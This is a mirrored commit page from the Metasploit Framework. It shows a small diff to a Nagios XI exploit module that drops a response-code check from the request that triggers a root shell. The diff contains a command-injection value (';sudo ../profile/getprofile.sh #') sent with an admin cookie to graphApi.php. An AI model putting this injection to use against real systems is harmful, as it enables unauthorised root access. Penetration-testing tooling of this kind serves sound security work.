mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-05 14:57:30 +01:00
Fire and forget the shell
Edge case where reverse_perl returns 302 when app is unconfigured.
This commit is contained in:
parent
5f08591fef
commit
68bd4e2375
@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def pop_dat_shell
|
||||
res = send_request_cgi(
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',
|
||||
'cookie' => @admin_cookie,
|
||||
@ -221,10 +221,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'end' => ';sudo ../profile/getprofile.sh #'
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code != 200
|
||||
fail_with(Failure::PayloadFailed, 'Failed to execute root shell! punt!')
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
|
Loading…
Reference in New Issue
Block a user